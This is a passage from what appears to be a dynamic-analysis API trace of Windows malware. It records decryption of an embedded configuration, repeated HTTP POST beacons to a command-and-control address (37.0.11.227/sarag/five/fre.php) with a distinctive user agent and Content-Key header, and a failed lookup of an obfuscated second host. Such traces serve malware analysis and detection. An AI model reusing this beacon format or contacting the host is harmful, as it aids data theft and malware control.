dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0315.773] GetProcessHeap () returned 0x690000 [0315.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0315.774] GetProcessHeap () returned 0x690000 [0315.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0315.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.818] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0316.098] GetProcessHeap () returned 0x690000 [0316.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0316.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.154] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0316.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.156] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.157] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.157] GetProcessHeap () returned 0x690000 [0316.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0316.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.158] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0316.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.166] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0316.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.168] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0316.168] GetProcessHeap () returned 0x690000 [0316.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0316.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.169] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0316.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.170] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0316.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.174] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0316.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.175] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0316.175] GetProcessHeap () returned 0x690000 [0316.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0316.176] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0316.176] GetProcessHeap () returned 0x690000 [0316.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0316.176] socket (af=2, type=1, protocol=6) returned 0xac0 [0316.176] connect (s=0xac0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0316.202] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0316.202] GetProcessHeap () returned 0x690000 [0316.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0316.202] GetProcessHeap () returned 0x690000 [0316.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0316.203] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0316.204] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0316.204] GetProcessHeap () returned 0x690000 [0316.204] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0316.204] GetProcessHeap () returned 0x690000 [0316.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0316.205] GetProcessHeap () returned 0x690000 [0316.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0316.205] GetProcessHeap () returned 0x690000 [0316.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0316.206] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0316.209] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0316.209] GetProcessHeap () returned 0x690000 [0316.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0316.209] GetProcessHeap () returned 0x690000 [0316.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0316.210] send (s=0xac0, buf=0x6ad508*, len=242, flags=0) returned 242 [0316.210] send (s=0xac0, buf=0x6aba40*, len=159, flags=0) returned 159 [0316.211] GetProcessHeap () returned 0x690000 [0316.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0316.211] recv (in: s=0xac0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0316.288] GetProcessHeap () returned 0x690000 [0316.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0316.288] GetProcessHeap () returned 0x690000 [0316.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0316.289] GetProcessHeap () returned 0x690000 [0316.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0316.289] GetProcessHeap () returned 0x690000 [0316.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0316.289] closesocket (s=0xac0) returned 0 [0316.290] GetProcessHeap () returned 0x690000 [0316.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0316.290] GetProcessHeap () returned 0x690000 [0316.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0316.290] GetProcessHeap () returned 0x690000 [0316.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0316.290] GetProcessHeap () returned 0x690000 [0316.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0316.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1804) returned 0xac0 [0316.292] Sleep (dwMilliseconds=0xea60) [0316.294] GetProcessHeap () returned 0x690000 [0316.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0316.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.295] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0316.309] GetProcessHeap () returned 0x690000 [0316.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0316.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.310] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0316.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.311] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.312] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.312] GetProcessHeap () returned 0x690000 [0316.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0316.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.352] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0316.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.354] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0316.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.355] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0316.355] GetProcessHeap () returned 0x690000 [0316.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0316.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.356] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.357] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.358] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.359] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.359] GetProcessHeap () returned 0x690000 [0316.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0316.360] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.360] GetProcessHeap () returned 0x690000 [0316.361] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0316.365] GetProcessHeap () returned 0x690000 [0316.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0316.366] GetProcessHeap () returned 0x690000 [0316.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0316.367] GetProcessHeap () returned 0x690000 [0316.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0316.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.368] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.374] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0316.381] GetProcessHeap () returned 0x690000 [0316.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0316.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.382] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0316.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.383] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.385] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.385] GetProcessHeap () returned 0x690000 [0316.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0316.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.389] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0316.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.390] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0316.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.391] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0316.391] GetProcessHeap () returned 0x690000 [0316.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0316.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.392] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0316.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.393] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0316.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.394] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0316.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.395] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0316.396] GetProcessHeap () returned 0x690000 [0316.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0316.396] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0316.396] GetProcessHeap () returned 0x690000 [0316.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0316.396] socket (af=2, type=1, protocol=6) returned 0xac4 [0316.396] connect (s=0xac4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0316.632] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0316.641] GetProcessHeap () returned 0x690000 [0316.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0316.641] GetProcessHeap () returned 0x690000 [0316.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0316.641] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0316.642] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0316.642] GetProcessHeap () returned 0x690000 [0316.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0316.642] GetProcessHeap () returned 0x690000 [0316.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0316.643] GetProcessHeap () returned 0x690000 [0316.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0316.643] GetProcessHeap () returned 0x690000 [0316.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0316.644] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0316.644] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0316.644] GetProcessHeap () returned 0x690000 [0316.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0316.644] GetProcessHeap () returned 0x690000 [0316.645] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0316.645] send (s=0xac4, buf=0x6ad508*, len=242, flags=0) returned 242 [0316.646] send (s=0xac4, buf=0x6aba40*, len=159, flags=0) returned 159 [0316.646] GetProcessHeap () returned 0x690000 [0316.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0316.646] recv (in: s=0xac4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0316.735] GetProcessHeap () returned 0x690000 [0316.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0316.735] GetProcessHeap () returned 0x690000 [0316.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0316.735] GetProcessHeap () returned 0x690000 [0316.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0316.735] GetProcessHeap () returned 0x690000 [0316.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0316.736] closesocket (s=0xac4) returned 0 [0316.737] GetProcessHeap () returned 0x690000 [0316.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0316.737] GetProcessHeap () returned 0x690000 [0316.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0316.737] GetProcessHeap () returned 0x690000 [0316.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0316.737] GetProcessHeap () returned 0x690000 [0316.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0316.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1808) returned 0xac4 [0316.748] Sleep (dwMilliseconds=0xea60) [0316.750] GetProcessHeap () returned 0x690000 [0316.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0316.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.751] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0316.765] GetProcessHeap () returned 0x690000 [0316.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0316.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.766] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0316.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.767] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.769] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.769] GetProcessHeap () returned 0x690000 [0316.770] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0316.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.771] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0316.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.772] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0316.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.776] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0316.776] GetProcessHeap () returned 0x690000 [0316.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0316.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.777] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.778] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.781] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.782] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.782] GetProcessHeap () returned 0x690000 [0316.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0316.782] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.782] GetProcessHeap () returned 0x690000 [0316.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0316.782] GetProcessHeap () returned 0x690000 [0316.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0316.782] GetProcessHeap () returned 0x690000 [0316.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0316.783] GetProcessHeap () returned 0x690000 [0316.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0316.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.783] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.788] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0316.793] GetProcessHeap () returned 0x690000 [0316.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0316.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.794] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 